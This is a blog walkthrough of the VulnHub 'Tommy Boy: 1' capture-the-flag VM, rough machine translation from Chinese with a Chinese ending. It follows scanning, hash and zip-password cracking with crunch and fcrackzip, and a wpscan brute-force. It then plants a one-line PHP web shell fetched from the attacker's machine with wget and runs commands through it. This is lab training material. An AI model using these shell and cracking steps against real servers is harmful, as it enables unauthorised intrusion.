No.38-VulnHub-Tommy Boy: 1-Walkthrough penetration study

**

VulnHub-Tommy Boy: 1-Walkthrough

**

Drone address: https: //www.vulnhub.com/entry/tommy-boy-1,157/
drone Difficulty: Intermediate (CTF)
drone Release Date: July 27, 2016
drone Description:
San Shi Nike! Tommy boy needs your help!
Callaghan car company finally entered the field of modern technology, and the establishment of a Web server for its customers to order brake pads.
Unfortunately, the site has just paralyzed, the only person who has administrator credentials is Tom Callahan Sr.- he just died! Worse is that the only people who understand the server pulled out!
You need help Tom Jr., Richard and Michelle again to restore the page. Otherwise, Callahan auto companies will certainly be closed down :-( ---- Google Translation
goals: to find six flag
Author: Dayu
Time: 2020-02-01
Note: For all these computers, I have run the downloaded using VMware computer. I will use as an attacker Kali Linux machine to solve the CTF here the use of learning technology for educational purposes only, if the technology is listed for any other goal, I will not be responsible.

First, information collection

We need to identify targets in the VM's IP address, use nmap to obtain the destination IP address:

We've found the CTF target computer IP address: 192.168.182.140

nmap port scan to 22,80,8008 is open ...

Web look to that Callahan Auto! Page ...

direct access to the robots.txt found the first sign ...

Flag1 the Data: B34rcl4ws ...

find a jpg file ... view the next


did not find useful information ... back to the 80-port web pages, source code found in the preceding video page look ...


3 seconds of the video, gave us tips ... prehistoricforest ...

this is the blog ... here ... to find FLAG2


thisisthesecondflagyayyou.txt ... above or a wordpress CMD architecture blog, you can use directly wpscan sweep of ...

Flag the Data: Z4l1nsky , easy to find ...

content in July 2016 in the No. 7 also found / richard directory ...



found a hash value, look ... ce154b5a8e59c89732bc25d6a2e6b90b to crack

the password is spanky

browse here against the background of a password is required ... in front of the password MD5 value ... try

inside this article explains:
1. You can use the backup files Big Tom's home directory Callahanbak.bak recovery Callahan Auto website ...
2. only need to complete at Big Tom's account first, but Big Tom always forgets his password, as we've seen before in the Big Tom in as the second part of his SSH certificate is saved in the draft blog ...
under 3.Nick the FTP as well as other information, but the FTP server is not always online (15 minutes, 15 minutes and then cycle) ...
4.Nick just use easy to guess passwords reset the FTP account name "nickburns "and has deleted the SSH account ...
here referred to FTP, try to log on to try ...


nmap scan the FTP port is 65534 ... open the link into the username and password are nickburns ... have found the following to view the readme.txt file ... information:
there is a sub-folder on the file named NickIzL33t 1. server, Nick personal use ...
2. Nick creates an encrypted zip file to store the Big Tom credentials ...
3. Nick created a prompt to prompt for a password extracting encrypted zip file ...

and sure enough, the 8008 is a nick server ...

Steve Jobs ... here you can view the content directly to set the proxy ...

will not install here ... Search: Firefox user agent pl

set Iphon 3 agency, revisit ... (as mentioned earlier can only Steve Jobs visited)

there is hidden meaning html side, here are two ways to find, wfuzz and dirbuster, continue ...
here ... use dirbuster be

selected for the Iphone User agent and can ...

fill in the blast address, word lists, directories, html mode, you can ... probably burst a few minutes ...

There is hidden html: http: //192.168.182.140: 8008 / NickIzL33t / fallon1.html, visit ...

there are three tips above, I try to find the information one by one ...

extracted Big Tom encrypted password backup file from the first prompt ...

a case where Flag3: TinyHead
third flag ... flag will be downloaded to the local, and the third prompt to download a .zip local ...

to blast the third document under a hint ...

message: bev[A-Z][0-9][0-9][a-z][a-z][symbol]1955
I am using the given pattern generation crunch dictionary list ... Crunch learning link

command: crunch 13 13 -t bev,%%@@^1995 -o passlist_tomboy.txt
58 million combined, 10 seconds to complete ... fast hardware tools ...
and then use the dictionary file fcrackzip and generate an encrypted zip file to use crack together ...

command: fcrackzip -v -D -u -p dayu1.txt t0msp4ssw0rdz.zip(it took more than two minutes to )
password: bevH00tr $ 1995 decompression ...

unpacked pass into text ... found three user name and password ... suggests the important information: fatguyinalittlecoat
said that after that there are some numbers ... so what content to look to find the next blog ...

front to know this is a wordpress blog, here at wpscan scan it with the user name ...

command: wpscan -u http://192.168.182.140/prehistoricforest/ --enumerate u

command: wpscan -u http://192.168.182.140/prehistoricforest --wordlist /usr/share/wordlists/rockyou.txt --username tom --threads 50
password: tomtom1


Sure enough, Drafts found inside a E-mail, the symmetry previous explanation ... (it took 1 hour)
User: bigtommysenior Password: fatguyinalittlecoat1938 !!


flag4: EditButton
got flag4 ... also found LOOT.ZIP protected zip file and website backup files ...
the key is to restore Callahan Auto website ...

command: cp callahanbak.bak /var/www/html/index.html

Callahan Auto website back online ... access ...

Upon completion I have to mention the right ...

www-data is the owner of .5.txt need ... put a shell on the web can be read ...
Because of the back-end Web server is Apache ...
find a directory to upload the file ... is in .zip directory on the edge ...

HTTP : //192.168.182.140: 8008 / NickIzL33t // P4TCH_4D4MS /

simple set up a shell to read ...

<?php system($_GET['cmd']); ?>

命令：wget http://192.168.182.149:5555/dayushell.php -O sh.php
上传后在web执行cmd命令即可…

当然上传以上类型的shellcode也可以获得权限…
前往web访问：http://192.168.182.140:8008/NickIzL33t//P4TCH_4D4MS/uploads/sh.php?cmd=cat%20/.5.txt

flag5：Buttcrack
说到将flag1~5全部合并就能提取loot.zip…

前面已经知道在bigtommysenior用户下还存在一个LOOT.ZIP未解开…
flag1：B34rcl4ws
flag2：Z4l1nsky
flag3：TinyHead
flag4：EditButton
flag5：Buttcrack
密码： B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

全部找到…

这篇只有一个标题，信息收集…因为全在作者邮箱到博客里引导着走，全文离不开信息收集…
这里卡住的地方是需要用iphone代理来访问…加油！

由于我们已经成功找到六个flag，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。